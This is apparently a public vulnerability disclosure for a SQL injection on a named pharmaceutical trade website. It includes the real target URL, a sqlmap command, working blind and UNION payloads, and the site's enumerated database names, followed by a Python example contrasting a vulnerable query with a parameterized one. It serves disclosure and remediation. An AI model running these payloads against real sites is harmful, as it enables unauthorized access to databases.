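2014-05-10: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2014-06-24: The vendor has actively ignored the vulnerability; details are disclosed to the public.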
Zhejiang Netsun (浙江网盛生意宝) looks like a very large company, so it shouldn't ignore this, right?
Injection point:
sqlmap.py -u "http://expo.pharmnet.com.cn/pro_product/browse.cgi?id=489966&asid=114479 asid=114479" --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=489966 AND 8374=8374&asid=114479 asid=114479 Type: UNION query Title: MySQL UNION query (NULL) - 84 columns Payload: id=-1616 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a617171,0x676e7a444c7059546879,0x716c686271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&asid=114479 asid=114479---[19:20:37] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5[19:20:37] [INFO] fetching database names[19:20:37] [INFO] the SQL query used returns 25 entriesavailable databases [25]:[*] adsadmin_business[*] adsadmin_hub[*] bbs[*] bbs_pharmnet[*] chinafdc_law_com[*] chinapharmnet[*] dissertation[*] drugforum[*] fdc_law_com_cn[*] fdc_new[*] fdc_new_bak[*] information_schema[*] net_articles[*] netsun_cate[*] netsun_ecp[*] netsun_forum[*] netsun_key[*] netsun_Q[*] pharm[*] pharm_Q[*] pharm_search[*] pharmnet[*] service[*] session_tmps[*] test
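The privileges are quite broad; it looks like everything could be dumped. I did not dig any deeper.
Please don't ignore this.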
Unable to contact the vendor, or the vendor actively refused.
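The two findings sqlmap reports for the numeric `id` parameter (boolean-based blind and UNION query) both depend on the value being pasted into the SQL text. The following is an added example, not code from the report or from the vendor: it uses an in-memory SQLite table as a constructed stand-in for the MySQL back end, and the table schema and the function names `browse_vulnerable` and `browse_hardened` are assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the product table behind browse.cgi (schema assumed).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO product VALUES (489966, 'sample product')")
    return db

def browse_vulnerable(db, raw_id):
    # 'Before' form: the GET value is concatenated into the statement, so
    # everything after the number is parsed as SQL.
    return db.execute("SELECT id, name FROM product WHERE id=" + raw_id).fetchall()

def browse_hardened(db, raw_id):
    # 1. Accept only a short plain-decimal id; reject everything else up front.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a decimal integer")
    # 2. Bind the value as a parameter so it can never become SQL syntax.
    return db.execute("SELECT id, name FROM product WHERE id=?",
                      (int(raw_id),)).fetchall()

def demo():
    db = make_db()
    # Constructed inputs shaped like the payloads in the sqlmap output above
    # (the UNION is cut down to this table's two columns).
    inputs = [
        "489966",
        "489966 AND 8374=8374",   # true condition: row still returned
        "489966 AND 8374=8375",   # false condition: row disappears
        "-1616 UNION ALL SELECT NULL,'marker'",
    ]
    results = {}
    for value in inputs:
        vuln = browse_vulnerable(db, value)
        try:
            safe = browse_hardened(db, value)
        except ValueError:
            safe = "rejected"
        results[value] = (vuln, safe)
    return results

if __name__ == "__main__":
    for value, (vuln, safe) in demo().items():
        print(f"{value!r}\n  vulnerable: {vuln}\n  hardened:   {safe}")
```

The differing results for the true and false conditions are the signal a boolean-based blind check relies on; the hardened form returns the same rejection for both. Separately, the 25 databases listed in the output indicate that the web application's database account can see far more than one application's schema, so restricting its grants limits what any remaining injection can reach.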